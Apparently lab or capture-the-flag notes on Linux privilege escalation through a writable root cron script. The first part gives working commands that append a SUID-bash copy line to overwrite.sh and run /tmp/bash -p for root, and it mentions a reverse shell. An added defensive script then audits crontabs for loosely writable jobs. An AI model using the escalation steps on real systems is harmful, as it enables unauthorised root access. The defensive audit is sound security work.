how to find it (list the system cron jobs):
cat /etc/crontab
check file permissions on the scripts that run every minute:
ls -la /usr/local/bin/overwrite.sh
we have read and write perms, but no execute perms. But because it's in cron and executes every x minutes, we can still get it run!
this is what that file does:
ideally, if you can overwrite, you should be overwriting that file (overwrite.sh) with a reverse shell!
we’re just escalating:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
run strings or cat again to make sure we edited the file correctly:
strings /usr/local/bin/overwrite.sh
check if it's updated:
ls -la /tmp
yes, it has!
/tmp/bash -p
we have root!
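
defensive check for the misconfiguration used above, as an added example that is not part of the original notes: it lists jobs in a system-format crontab whose script file is writable by group or other. The function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (defensive audit): list cron jobs whose script file is
# writable by group or other, the overwrite.sh condition shown above.

# Exit 0 if the given path (symlinks followed) is group- or other-writable.
is_loosely_writable() {
    # Mode string looks like -rw-r--rw-; char 6 = group w, char 9 = other w.
    case "$(ls -ldL "$1" 2>/dev/null | cut -c6,9)" in
        *w*) return 0 ;;
        *)   return 1 ;;
    esac
}

# Print "user path" for every loosely writable file a job refers to.
# Expects system crontab format: 5 time fields (or @shortcut), user, command.
audit_crontab() {
    # Drop comments, blank lines and VAR=value assignments.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=)' "$1" |
    (
        set -f    # no globbing when splitting the command into words
        while read -r f1 f2 f3 f4 f5 f6 rest; do
            case "$f1" in
                @*) user=$f2; cmd="$f3 $f4 $f5 $f6 $rest" ;;
                *)  user=$f6; cmd=$rest ;;
            esac
            for word in $cmd; do
                word=${word%%[;&|]*}          # strip trailing shell operators
                case "$word" in /*) ;; *) continue ;; esac
                if [ -f "$word" ] && is_loosely_writable "$word"; then
                    echo "$user $word"
                fi
            done
        done
    )
}

# Constructed sample (not from the host in these notes): one job with a
# world-writable script, one with a 755 script.
make_sample() {
    printf '#!/bin/sh\n' > "$1/overwrite.sh"; chmod 666 "$1/overwrite.sh"
    printf '#!/bin/sh\n' > "$1/safe.sh";      chmod 755 "$1/safe.sh"
    printf '%s\n' 'SHELL=/bin/sh' '# m h dom mon dow user command' \
        "* * * * * root $1/overwrite.sh" \
        "@reboot root $1/safe.sh" > "$1/crontab"
}

d=$(mktemp -d) && make_sample "$d" && audit_crontab "$d/crontab"; rm -rf "$d"
```

on a real host, call audit_crontab /etc/crontab; any line it prints is a job that a non-owner can modify, and the fix is to make the script root-owned with mode 755 or stricter.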